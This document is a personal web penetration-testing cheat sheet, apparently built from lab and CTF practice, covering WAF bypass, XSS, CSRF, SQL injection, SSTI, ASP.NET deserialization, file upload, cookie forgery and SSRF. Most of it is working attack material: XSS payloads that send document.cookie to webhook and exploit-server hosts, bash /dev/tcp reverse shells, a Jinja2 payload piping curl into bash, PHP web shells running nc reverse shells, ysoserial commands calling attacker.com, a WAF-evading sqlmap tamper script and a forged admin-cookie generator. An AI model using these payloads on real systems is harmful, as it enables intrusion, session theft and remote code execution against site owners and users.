# Web Penetration

**Basic Information**

Checklist: https://book.hacktricks.xyz/pentesting-web/web-vulnerabilities-methodology

[PortSwigger Web Security write-ups](/6XUFmwPkRAeVHV39XUS6oA)

**Useful browser extensions**

- Wappalyzer
- X-Forwarded-For
- Edit Cookie
- DotGit (.git leak check) | git-dumper (download the exposed repository)

Public server for testing out-of-band requests: https://webhook.site

# WAF Bypass

## Fuzzing filtered characters

Wordlist: /usr/share/seclists/Fuzzing/special-chars.txt

```
ffuf -request-proto http -request req1 -w /usr/share/seclists/Fuzzing/special-chars.txt -t 1
```

Match only the forbidden responses (403) to list the characters the WAF blocks:

```
ffuf -request-proto http -request req1 -w /usr/share/seclists/Fuzzing/special-chars.txt -mc 403
```

![圖片](https://hackmd.io/_uploads/r1E_l8w7R.png)

## Request size limits

Many WAFs stop inspecting a body after a fixed number of bytes; padding the request pushes the payload past that point: https://github.com/assetnote/nowafpls?tab=readme-ov-file#documented-waf-limitations

## No spaces

Alternative whitespace encodings:

```
%20 %09 %0D %0C %0B %0A %A0
```

Bash `${IFS}` in place of a literal space:

```
ls${IFS}-la
echo${IFS}meowkkkkkkkkkkk
cat${IFS}/*fla*
```

## Emoji obfuscation

https://book.hacktricks.xyz/pentesting-web/unicode-injection#emoji-injection
https://medium.com/@fpatrik/how-i-found-an-xss-vulnerability-via-using-emojis-7ad72de49209

After the application's charset conversion the emoji bytes come out as ASCII that contains the tag delimiters:

```
💋 -> d"Y'<
💛 -> d"Y'>
```

The `//` comments out the trailing `d"Y'` as JavaScript.

```
💋img src=x onerror=alert(document.domain)//💛
```

![圖片](https://hackmd.io/_uploads/SkluKKY40.png)

```
💋img/src=x onerror=alert(document.domain)//💛
💋svg/onload=alert`document.domain`//💛
💋iframe/src=javascript:alert`1`//💛
```

## SQL injection

### Unicode escapes (JSON)

https://www.ifreesite.com/unicode-ascii-ansi.htm

Vulnerable when PHP `json_decode()` (or a similar decoder) turns the escape back into a quote after the filter has run:

```
' -> \u27
' -> \u027
' -> \u0027
```

## XSS

### Between tags

#### HTML

```html
<svg/onload=alert(/xss/)>
<img src="not_exist" onerror="alert(1)">
<img/src/onerror=alert(1)>
<svg onload=&#x70;&#x72;&#x6f;&#x6d;&#x70;&#x74;()></svg>
<svg onload="&#97;&#108;&#101;&#114;&#116;(1)"></svg>
<link rel=attachment href="http://attacker.com">
```

**Multiple leading zeros** (the HTML entity decoder ignores them, so they slip past naive pattern matching):

```html
<svg onload=&#x000000000000070;&#x0000000072;&#x000006f;&#x6d;&#x70;&#x74;()>
<svg onload="&#00000000000000000000000000000000000000000097;&#108;&#101;&#114;&#116;(1)"></svg>
```

#### Unicode

JavaScript identifiers may be written with `\uXXXX` escapes, so the handler still resolves to `prompt`:

```html
<svg onload=prompt()></svg>
<svg onload=\u0070\u0072\u006f\u006d\u0070\u0074()></svg>
```

Works.

### In URL

`atob()` decodes base64. A `javascript:` URL whose expression evaluates to a string renders that string as the new document, so the decoded tag executes:

```
atob`ZG9jdW1lbnQud3JpdGUoIjxoMT5UaGlzIGlzIHRlc3Q8L2gxPiIp`
```

```
Payload: <img src=1 onerror=alert("Hello")>
Base64 encoded: 'PGltZyBzcmM9MSBvbmVycm9yPWFsZXJ0KCJIZWxsbyIpPg=='
URL: ?redirect=javascript:atob`PGltZyBzcmM9MSBvbmVycm9yPWFsZXJ0KCJIZWxsbyIpPg==`
```

# XSS

Leverage: the user trusts the website (the flaw is in the site, not in the victim's browser). Sources:

- URL parameter
- URL file path
- POST data
- HTTP headers

Note: if the browser or the application URL-encodes the input before it is processed, the payload may not fire.

## XSStrike (automatic)

**Useful options**

`--proxy` -> defaults to 0.0.0.0:8080 (set in core/config.py)

```
python xsstrike.py -u https://0ab8002a03f5ad1f818c0747004200d7.web-security-academy.net/?search=123 --proxy
```

`--crawl`

```
python xsstrike.py -u https://0ab8002a03f5ad1f818c0747004200d7.web-security-academy.net/ --crawl --level 4
```

### Single endpoint

GET

```
python xsstrike.py -u https://0ab8002a03f5ad1f818c0747004200d7.web-security-academy.net/?search=123 --proxy
```

POST

```
python xsstrike.py -u "0a110090043fe54f816f7650004e00c4.web-security-academy.net/product?productId=1" --data "q=query"
```

DOM XSS: with `-u` XSStrike also scans the page's JavaScript and reports the vulnerable code:

![image](https://hackmd.io/_uploads/H10dsJPNC.png)

### Testing blind XSS

Config: /core/config.py

![圖片](https://hackmd.io/_uploads/ByLMOLrUC.png)

`--blind` injects the blind XSS payload into every parameter while crawling:

```
# GET (works); POST did not work -> do it manually
python xsstrike.py -u http://example.com/page.php?q=query --crawl --blind
```

### History

```
python xsstrike.py --seeds urls.txt
python xsstrike.py -u "http://example.com" -t 10 --crawl --level 3
```

## HTML attributes

```html
# Tag close
"><script>alert(document.domain)</script>
# search bar (most common!)
"><iMg src=meow onerror=&#00000000000000000000000000000000000000000097;&#108;&#101;&#114;&#116;`meow`>
```

```
# Attribute close
padding' autofocus onfocus=alert(document.domain) x='padding
padding" autofocus onfocus=alert(document.domain) x="padding
padding" autofocus onfocus=prompt`document.domain` x="padding
"123%0aaUtofocUS%0aONFOcUS=prompt('testing')
```

## Option tags

```
padding" onclick=alert(1) x="padding
```

Link tags (`<a>`): the handler needs a user trigger through an access key:

```
'accesskey='x'onclick='alert(1)
?'accesskey='x'onclick='alert(1)
```

User trigger: ALT+SHIFT+X (Firefox), CTRL+ALT+X (macOS), ALT+X (Chrome/Edge on Windows)

If the `src` attribute is controllable:

```
javascript:prompt(/xss/)
javascript:window.location=//webhook.site/bcbed4e2-db5a-454d-a7eb-e7ba14ced174
```

## Between the tags

### Testing HTML tags (some tags are blocked)

```
<b>meowhecker</b>
<s>meowhecker</s>
<hTML%0DoNPOInTeREnTEr%0D=%0Da=prompt,a()%0Dx>
<DEtAiLS%09oNPOiNTerenTeR%0A=%0Aa=prompt,a()%0Dx>3nd
</tiTLe><HtMl%09OnmoUseoVer%0d=%0d["nics113pt36507"].find(confirm)//
<iframe src=javascript:document.cookie;alert(1)></iframe>
<iframe src="<?php echo htmlspecialchars($_GET['src']) ?>">   # https://vul.com?src=javascript:alert(1)  (htmlspecialchars does not stop a javascript: URL)
window.location = 'javascript:alert(1)'
<a href=javascript:alert(1)>click Me</a>
```

### Closing tags (/select, /option)

```
</option></select><DEtAiLS%09oNPOiNTerenTeR%0A=%0Aa=prompt,a()%0Dx>3nd
```

### Load remote HTML or script (blind XSS)

```html
# Identify
<img src=//webhook.site/83ce596e-c4f8-4bc9-906c-fd54441fb64e?XsS onerror=prompt();>
<meta http-equiv="refresh" content="0; url=https://webhook.site/8ebdbec3-2440-4902-a029-09b70c44adaf/index.html">
<script src=http://webhook.site/83ce596e-c4f8-4bc9-906c-fd54441fb64e/csrf.js></script>
<img src="meowhecker" onerror="document.write('<script src=https://webhook.site/83ce596e-c4f8-4bc9-906c-fd54441fb64e></script>')"/>
```

## XSS in JavaScript context

### Break the JS string / close the script tag (`<` and `>` must survive)

```
# Firefox, Chrome
</script><img/src=1 onerror=alert`document.domain`>
# Chrome
</SCRiPT/><DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt,a()//
<DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt(document.domain),a()//
```

If `'` or `"` survive but `<` is filtered:

```
'-alert(1)-'
';alert(document.domain)//
'-document.write("<s>Meowhecker</s>")-'
# bypass when ' is not allowed: the HTML parser decodes the entity before the JS runs (e.g. inside an event-handler attribute)
&#x27;-alert(1)-&#x27;
&apos;-alert(1)-&apos;
&#x27;-document.write("<s>Meowhecker</s>")-&#x27;
```

### JavaScript template literal

Vulnerable code:

```
var name = `source can control`   // JavaScript template literal
```

Exploit:

```
${alert(document.domain)}
```

### Steal cookies

```
javascript:window.location="//webhook.site/bcbed4e2-db5a-454d-a7eb-e7ba14ced174?a="+btoa(document.cookie)
<iframe src=javascript:window.location="//p7xye7qy9fvyogvam896eah4hvnmbcz1.oastify.com?a="+btoa(document.cookie)></iframe>
<svg onload=document.location='//exploit-0a9500bb032c0b9680c634b101d400fc.exploit-server.net/exploit?log='+btoa(document.cookie)></svg>
<script>window.location.href = "https://exploit-0a9c0098048473df859011c101d70033.exploit-server.net/exploit?log=" + document.cookie;</script>
<img src=//p5vt8fwjrjs5w7b0c8bcmkivhmndb3zs.oastify.com?image onerror=fetch(`//webhook.site/bcbed4e2-db5a-454d-a7eb-e7ba14ced174/?A=${encodeURIComponent(document.cookie)}`);>
```

Meta refresh variant (not verified):

```
var link = document.createElement('meta');
link.httpEquiv = 'refresh';
link.content = '1; url=//mwoehcker.com?a=' + document.cookie;
document.getElementsByTagName('head')[0].appendChild(link);
```

## In URL -> `javascript:` protocol

```html
javascript:&#x5c;u0061lert`1`
javascript:\u{00000000000000000000061}\u006c\u0065\u0072\u0074`1`
```

# XSRF

Leverage: the server trusts the user's browser (the session cookie is attached to the forged request automatically).

## Exploit - CSRF change password

Basic (works):

```html
<html>
  <body>
    <form action="http://login.worldwap.thm/change_password.php" method="POST">
      <input type="hidden" name="new_password" value="meowmeow" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```

URL bypass (works; the target URL is base64-decoded at runtime, so it does not appear literally in the page source):

```html
<html>
  <body>
    <form id="myForm" method="POST">
      <input type="hidden" name="new_password" value="meowmeow" />
    </form>
    <script>
      var form = document.getElementById("myForm");
      var actionUrl = atob("aHR0cDovL2xvZ2luLndvcmxkd2FwLnRobS9jaGFuZ2VfcGFzc3dvcmQucGhw");
      form.setAttribute("action", actionUrl);
      form.submit();
    </script>
  </body>
</html>
```

## Favicon (detect framework)

https://wiki.owasp.org/index.php/OWASP_favicon_database

```
wget -qO- <favicon-url> | md5sum
```

# CMS Scanner

## CMS scanner (general)

https://github.com/Tuhinshubhra/CMSeeK

## wpscan

WordPress scanner: https://github.com/wpscanteam/wpscan

*Enumerate*

```
wpscan --url internal.thm/wordpress/
```

**Exploit** (password brute force; worked on 5.4.2)

```
wpscan --url $TARGET_DOMAIN/wordpress/ --passwords rockyou.txt --usernames admin --max-threads 50
```

## joomscan

Joomla scanner: https://github.com/OWASP/joomscan

# Authentication Bypass

## List of login bypasses

https://book.hacktricks.xyz/pentesting-web/login-bypass/sql-login-bypass

## Brute-force attack

[Remote Brute Force Login](/ngZz3rf5QMyfW_8cIGJHKw)

Response-time based username enumeration:

- Set a long password (50~100 characters): a valid username makes the server hash it, so the response is measurably slower

### Defence mechanisms

- IP block
- Account lockout
- Rate limit

### Bypass

#### IP block

```
X-Forwarded-For: x
```

- Reset mechanism: the failure counter resets after a successful login, so interleave a known-valid credential pair into the wordlist
  https://raw.githubusercontent.com/Meowheckerrr/WebSecurity/main/ToolsDev/AddingValidStringToWordlist/addingValidBypassIpBlock.py

#### Account lockout

Way 1 - Password spraying

- Step 1: enumerate -> user list (from the response difference)
- Step 2: pick a very small shortlist of passwords; it must stay below the lockout threshold

Way 2 - Credential stuffing

### Username enumeration

- Forgot password
- Login page
- Account lockout mechanism
-> look at the error message (different text or timing for valid vs. invalid users)

### Password brute force

#### POST form brute force

```bash
WEB_URL='/wp-login.php'
PARAMETERS='log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.125.64%2Fwp-admin%2F&testcookie=1'
hydra -l 'elliot' -P rockyou.txt $TARGET_IP http-post-form "$WEB_URL:$PARAMETERS:The password you entered for the username" -vV -t 10
```

#### HTTP Basic Authentication

Login methods:

```
http://username:password@HOST_DOMAIN_AND_IP
```

![圖片](https://hackmd.io/_uploads/SktY3Mcx0.png)

```
Authorization: Basic base64('username:password')
```

![圖片](https://hackmd.io/_uploads/ByBc3f9lA.png)

```
hydra -l 'admin' -P rockyou.txt -s 80 $TARGET_IP http-get $WEB_URL -v
```

# HTTP Header Bypass

## Rewrite source IP & rewrite request path

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/special-http-headers#headers-to-change-location

Request path override headers (honoured by some front-ends and frameworks; send an innocuous path plus the header):

```
X-Original-URL
X-Rewrite-URL
```

# Access Control

## Method bypass

Original request:

```
POST /admin-roles
username=carlos&action=upgrade
```

Exploit (an unrecognised verb falls through the per-method access check; the parameters move to the query string):

```
POSTA /admin-roles?username=wiener&action=upgrade
```

Works.

Flawed checks:

- Unprotected URL
- Parameter-based flaws
- URL-based access control (proxy) & HTTP header bypass
- Proxy and framework URL-matching discrepancies
- Method-based flaws

# LDAP Injection

https://129538173-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-a58ea2462cf2b98a868750b068a00fa32ccb807b%2FEN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf?alt=media

![圖片](https://hackmd.io/_uploads/SyAOZnpG0.png)

## Auth bypass

Normal filter query:

```
(&(USER=admin)(PASSWORD=pass))
```

Bypass (injected as the username: `(&)` is the always-true filter, and the rest of the original filter is left behind as a second, ignored filter):

```
admin)(&))
```

## Information disclosure

Normal filter query:

```
(|(type=Object1)(type=Object2))
```

Malicious (injected in place of Object1):

```
computer)(uid=*)
```

# Command Injection

## Payloads

![圖片](https://hackmd.io/_uploads/HkRXkriQ0.png)

```
`sleep 5`
```

## Bash Shell (Shellshock)

![圖片](https://hackmd.io/_uploads/HJQTg-de0.png)
(default command) + (injection point)

```bash
() { :; }; sleep 10
# or
() { :; }; ping 127.0.0.1 -c 10
# or
() { :; }; curl http://ik63y1ea94vws1xaeeo2ujwspjvaj87x.oastify.com
```

## CLI no space

See the `${IFS}` and `%09`/`%0A` tricks under "No spaces" above.

## Reverse shell (Linux)

On the attacker host:

```
echo "bash -i >& /dev/tcp/10.10.14.12/443 0>&1" > revshell
python3 -m http.server 80
```

On the target:

```
curl http://10.10.14.12/revshell -o /tmp/revshell
bash /tmp/revshell
```

# NoSQL injection

Table -> collection
Records -> document

Normal query:

```
db.handgun.find({"owner":"meowhecker"})
```

# SQL Injection

## Filter bypass

XML obfuscation (the XML parser decodes the entities before the query is built, so a keyword filter on the raw body never sees `UNION SELECT`):

```
1 UNION SELECT null-- -
1 &#x55;&#x4e;&#x49;&#x4f;&#x4e;&#x20;&#x53;&#x45;&#x4c;&#x45;&#x43;&#x54;&#x20;&#x6e;&#x75;&#x6c;&#x6c;&#x2d;&#x2d;&#x20;&#x2d;
```

Works.

## Manual exploit

**Show tables**

```
union select table_name from information_schema.tables-- -
```

Works.

**Show columns (of a given table)**

```
union select column_name from information_schema.columns where table_name='users'-- -
```

**Retrieve data**

```
union select username || '~' || password from users
UNION SELECT CONCAT(email, '|', password, '|', username) AS meow FROM users
```

Works. (`||` concatenates on PostgreSQL, Oracle and SQLite; on MySQL it is logical OR, so use `CONCAT()`.)

## sqlmap

https://github.com/sqlmapproject/sqlmap
https://www.geeksforgeeks.org/use-sqlmap-test-website-sql-injection-vulnerability/

WAF bypass (reference): https://www.vaadata.com/blog/exploiting-an-sql-injection-with-waf-bypass/

Default User-Agent (trivial for a WAF to block):

```
sqlmap/1.x.x#stable (https://sqlmap.org)
```

### Useful options

**--random-agent**

**--tamper**: payload-encoding scripts
https://muhdaffa.medium.com/tips-and-tricks-for-effective-sql-injection-testing-using-sqlmap-tamper-scripts-ed4bfa5717e7

F5 bypass, e.g.
unicode escaping of the payload:

```
sqlmap -r req --tamper=charunicodeescape -p user --threads 10 --dbs
```

**--delay**: keeps the request rate under the WAF's rate limit (important)

```
--delay 1
--delay 3 (stable)
--delay 5 (stable)
```

**--proxy**: route the traffic through Burp

**--level 5 --risk 3**: best-effort, tries every payload (`--level` widens the injection points and tests, e.g. headers and cookies; `--risk` enables the heavier OR-based payloads)

**--batch**: default answer to every prompt

**--dbs**: fetch the database names

**--dump-all**: dump everything

**--exclude-sysdbs**: skip the system databases

**--ignore-timeouts**: ignore connection timeouts

**--threads**: number of concurrent requests

### Basic usage

```
# No WAF
sqlmap -r req --dbs --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 -p d
sqlmap -r req --random-agent --dbs --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 --threads=10

# WAF
sqlmap -r req --random-agent --tamper=charunicodeescape --delay 1 --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080
sqlmap -r req --tamper=charunicodeescape --delay 1 --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 --dbs --exclude-sysdbs --dump-all
sqlmap -r req --random-agent --tamper=charunicodeescape -p user --dbs --dbms=mysql --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 --delay 3
sqlmap -r req1 --random-agent --tamper=charunicodeescape --delay 3 --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 --dbs --exclude-sysdbs --dump-all

sqlmap -r req1.txt --risk=3 --level=5 --random-agent --dbs -p username
```

More examples:

```
sqlmap -u "http://10.10.249.47/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
```

Vulnerable website -> http://10.10.249.47/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml

- `--risk` -> heavier, more intrusive payloads
- `--level` -> more injection points and more complex tests
- `--random-agent` -> random User-Agent from sqlmap's list
- `--dbs` -> enumerate the database names
- `-p` -> parameter to test (the vulnerable parameter)

### Exploitation

Task -> find the admin credentials

Listing information: `-D` -> database, `-T` -> table

Show tables:

```
sqlmap -r apiTest.txt -D vn_admin --tables
```

Show columns:

```
sqlmap -r apiTest.txt -D vn_admin -T fe_users --columns
```

Dump data:

```
sqlmap -r apiTest.txt -D vn_admin -T fe_users -C password --dump
```

# Custom tamper example

```python
#!/usr/bin/env python
# Custom sqlmap tamper script: wraps keywords in MySQL version comments,
# breaks up UNION with comment/newline junk and replaces spaces with /**/.
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL


def dependencies():
    pass


def tamper(payload, **kwargs):
    # keywords the WAF is expected to match on; wrapped in /*!50000 ... */ so
    # MySQL still executes them while the signature no longer matches
    crucial = [
        'DATABASE()', 'FROM', 'schema_name', 'INFORMATION_SCHEMA.SCHEMATA', 'table_name',
        'INFORMATION_SCHEMA.TABLES', 'table_schema', 'column_name', 'INFORMATION_SCHEMA.COLUMNS',
    ]
    if payload:
        if 'UNION' in payload:
            payload = payload.replace('UNION', '/*!--%20-%0AuNiOn%23a%0A*/')
        if payload.startswith('42 '):
            # sqlmap's test value: add a false predicate so the original row is dropped
            payload = payload.replace('42 ', '42 and 0 ')
        for word in crucial:
            if word in payload:
                payload = payload.replace(word, f'/*!50000{word}%23a%0A*/')
        if '-- ' in payload:
            payload = payload.replace('-- ', '--%20')
        payload = payload.replace(' ', '/**/')
    return payload
```

# Deserialization

## ASP.NET

### Exploit: __VIEWSTATE parameter

Ref: https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-parameter

ViewState carries the page and control state between requests; it is serialised into a hidden field when the page HTML is rendered and deserialised again on postback.

#### Case 1

- EnableViewStateMac = True/False (?)
- ViewStateEncryptionMode = True

web.config (found by fuzzing):

```
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
```

Generate the payload (note: `--path` must match the page that consumes the ViewState):

```
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
```

Works (values without quotes, using the page's `__VIEWSTATEGENERATOR` value instead of `--path`/`--apppath`):

```
.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "ping 10.10.14.5" --generator=90AA2C29 --decryptionalg=AES --decryptionkey=B16DA07AB71AB84143A037BCDD6CFB42B9C34099785C10F9 --validationalg=SHA1 --validationkey=99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF --viewstateuserkey=SAltysAltYV1ewSTaT3
```

Listener on the VPN interface:

```
sudo tcpdump -ni tun0 icmp
```

# SSTI

Reference: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

Fuzzing - engine identification:

```
${{<%[%'"}}%\
<%=meowhecker%>
{{6*9}}
${6*9}
{{7/0}}   -> the error message reveals the engine
${7/0}
```

## Plaintext context (injected expression)

ERB (template engine):

```
<%= system("whoami") %>
```

Handlebars: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#handlebars-nodejs (blind RCE, works)

## Code context (close the expression)

Tornado (template engine):

```
"A" }} {{Exploit-Methods or Objects}} {{"B"
"meowHead" }} {% import os %} {{os.system('whoami')}} {{"meowTail"
```

## RCE Python - Jinja2 (filter bypass)
https://starlox.medium.com/hackthebox-iclean-writeup-cfc46f351353

Reverse shell served by the attacker as `reshell`:

```
bash -i >& /dev/tcp/10.10.14.79/443 0>&1
```

Payload (`__` is written as `\x5f\x5f` so an underscore filter does not match):

```
{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("curl 10.10.14.79:80/reshell | bash")|attr("read")()}}
```

# API Testing

## Bearer token auth bypass (CSRF)

Bearer token authentication: the client explicitly sets an `Authorization` header containing the token on every request. Because the browser does not attach that header automatically (unlike cookies), a cross-site form or image cannot send an authorised request in the victim's name, so bearer tokens are an effective CSRF defence. The test is whether the server really relies on the token: delete the cookie and confirm that the bearer token alone authenticates the request.

```
POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1
Host: teamcity.runner.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.VHNYZVRNS0t3UWlkeXVEeklQSUFUVDJWTk1j.YjhjYTIyZTEtNTQwNi00ZjQ5LWJmOTEtNjkyODkwNTUxYTQx
Connection: close
```

# Fuzzing

Tools list -> ffuf -> Burp Suite Professional

Documentation -> ffuf, fuzzing multiple locations: https://codingo.io/tools/ffuf/bounty/2020/09/17/everything-you-need-to-know-about-ffuf.html#fuzzing-multiple-locations (to read)

## Hidden parameters

When a sensitive .php/.asp page is found but returns a blank page or "parameter missing":

### Arjun (recommended tool)

```
arjun -u http://internal.analysis.htb/users/list.php
```

## Valid extensions

```
ffuf -request-proto http -request req -w /usr/share/seclists/Fuzzing/extensions-most-common.fuzz.txt
```

# Path Traversal

```
http://meowhecker.com/index.php?file="filePath"
```

Fuzzing

**Linux**

```
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
```

**Windows**

Fuzzing lists:
```
wget https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/dirTraversal-win.txt
wget https://raw.githubusercontent.com/carlospolop/Auto_Wordlists/main/wordlists/file_inclusion_windows.txt
```

(Found - 1) win.ini

```
ffuf -request-proto https -request req -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -fs 15
ffuf -request-proto http -request req -w ./dirTraversal-win.txt -fs 15
```

## Exploit - Windows

https://gist.github.com/SleepyLctl/823c4d29f834a71ba995238e80eb15f9

- hMailServer (username, password): `C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini`

# File Upload

Extension wordlist: /usr/share/wordlists/dirb/extensions_common.txt

First check what kind of filter the upload page applies.

## Bypass

### Content-Type check

![image](https://hackmd.io/_uploads/Hy6hfaWyC.png)

Bypass the Content-Type check by keeping the PHP extension and lying in the part header:

```
Content-Disposition: form-data; name="file"; filename="shell.jpg.php"
Content-Type: image/jpeg

<?php echo "<pre>" . shell_exec("mkfifo /tmp/f; nc 10.17.1.166 80 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f") . "</pre>"; ?>
```

### Extension check

Multiple extensions:

```
shell.jpg.php
shell.php.jpg
```

Next step (verify each one):

```
shell.php%0a%0d.jpg
shell.php%0d%0a.jpg
shell.php .jpg
shell.php%00.jpg
shell.php\x00.jpg
```

(If one works) exploit:

```
cp shell.php%0a%0d.jpg shell.php   # the service ends up storing the upload as shell.php
```

## Magic bytes (code injection in image metadata)

Way 1: PoC

```
exiftool -Comment="<?php echo 'START ' . phpinfo() . ' END'; ?>" ./Cat03.jpg -o JPGwithPHPinfo.php
```

![圖片](https://hackmd.io/_uploads/rJQuybwm0.png)

## HTTP verb (PUT)

```
PUT /images/exploit.php HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-httpd-php
Content-Length: 24

<?php echo phpinfo(); ?>
```

## Exploit - read sensitive files (.shtm/.shtml - SSI)

Payload `read.shtml`:

```
<!--#include file="web.config" -->
<!--#include file="/web.config" -->
```

The real content shows up in the page source.

### Exploit - web shell RCE

### PHP

PoC:

```
<?php phpinfo(); ?>
```

Web shell:

```
<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
```

```
<?php echo "<pre>" . shell_exec("mkfifo /tmp/f; nc 10.4.42.63 80 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f") . "</pre>"; ?>
```

Windows XAMPP - works.

# Cookie Crack

## ASP.NET (web.config)

Check the HTTP runtime tags:

![圖片](https://hackmd.io/_uploads/Hyi8yrz70.png)

If the machine does not have the specified .NET Framework version, install the pack from Microsoft.

Version 4.6.1: https://www.microsoft.com/en-us/download/details.aspx?id=49978

![圖片](https://hackmd.io/_uploads/rkQiTDmXC.png)

Decryption code: https://github.com/liquidsec/aspnetCryptTools/blob/main/FormsDecrypt.cs

Add reference - System.Web

![圖片](https://hackmd.io/_uploads/ryMfzK77A.png)

Add the machineKey to App.config (from the repo): https://github.com/liquidsec/aspnetCryptTools/blob/main/app.config

```xml
<?xml version="1.0"?>
<configuration>
  <system.web>
    <compilation debug="false" targetFramework="4.0" />
    <machineKey validationKey="99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF" decryptionKey="B16DA07AB71AB84143A037BCDD6CFB42B9C34099785C10F9" validation="SHA1" decryption="AES" />
  </system.web>
</configuration>
```

![圖片](https://hackmd.io/_uploads/ryVU7FNQA.png)

Decrypting the `.ASPXAUTH` value:

![圖片](https://hackmd.io/_uploads/rkTmPKNXC.png)

![圖片](https://hackmd.io/_uploads/rkhcwtNXA.png)

Modify the user account -> admin email. Decrypted ticket:

```
1 nicstesting01@gmail.com 2024/5/17 03:22:29 PM 2024/5/17 03:52:29 PM True test /
```

Cookie parameters (in the same order): https://learn.microsoft.com/en-us/dotnet/api/system.web.security.formsauthenticationticket.-ctor?redirectedfrom=MSDN&view=netframework-4.8#system-web-security-formsauthenticationticket-ctor(system-int32-system-string-system-datetime-system-datetime-system-boolean-system-string)

- version
- name
- issueDate
- expiration
- isPersistent
- userData

## Generate admin cookie

Source code: https://github.com/liquidsec/aspnetCryptTools/blob/main/FormsEncrypt.cs
![圖片](https://hackmd.io/_uploads/HyesjFEQ0.png)

```csharp
using System;
using System.Web.Security;

namespace FormsEncryptor
{
    class Program
    {
        static void Main(string[] args)
        {
            // Take an existing forms cookie (the .ASPXAUTH value captured from the target)
            string encryptedTicket = "8A9A1063BAE0F9E7E881A908E4DEA1C4F2BC2DE8995DB401651CD6F653289C1BF05371D2FE6A5E412AE7C4F4BBEA9B630335576CA4E65DCA42CDBC8207A125E0CCD9CD6CDA0E6468D060DCB409F981F04CEEBAE7CB617E74DD3E3849CE3DA02A9C7201667D7DCF8956724E2572148192CD1F446ED28BC4601C24463280E6A20BF2530D31A67CD627172E504CC77F12374D7E8DDF";
            string adminUsername = "admin@perspective.htb";

            // Decrypt with the machineKey from App.config so the other ticket fields can be reused
            FormsAuthenticationTicket unencryptedTicket = FormsAuthentication.Decrypt(encryptedTicket);

            FormsAuthenticationTicket ticket = new FormsAuthenticationTicket(
                1,
                adminUsername,                          // comment out to keep the original username
                DateTime.Now,
                DateTime.Now.AddMinutes(1200000),       // very long expiry (1,200,000 minutes)
                unencryptedTicket.IsPersistent,
                unencryptedTicket.UserData,
                "/"
            );

            // Encrypt and sign with the same machineKey -> forged admin cookie
            string encTicket = FormsAuthentication.Encrypt(ticket);
            Console.WriteLine(encTicket);
            Console.Read();
        }
    }
}
```

Admin cookie:

![圖片](https://hackmd.io/_uploads/ryaQycN70.png)

# SSRF

Hidden attack surface:

- Hostname, request path
- External entities (exploit XXE to SSRF)
- Referer header

Dangerous functions

PHP:

```php
file_get_contents()
curl_exec()
fopen(), fread(), fclose()
```

Python:

```python
requests.get(), requests.post()
urllib.request.urlopen()
```

ASP:

```
ServerXMLHTTP
Server.CreateObject("Msxml2.ServerXMLHTTP")
```

## Bypass (blocklist)

## Tag filter

```
<meta http-equiv="refresh" content="0; url=http://127.0.0.1:8000">
```

The response comes back inside the XML, so read it from the page source.

## Alternate representations of 127.0.0.1

```
2130706433
017700000001
127.1
localtest.me
customer1.app.localhost.my.company.127.0.0.1.nip.io
127.0.0.1.nip.io
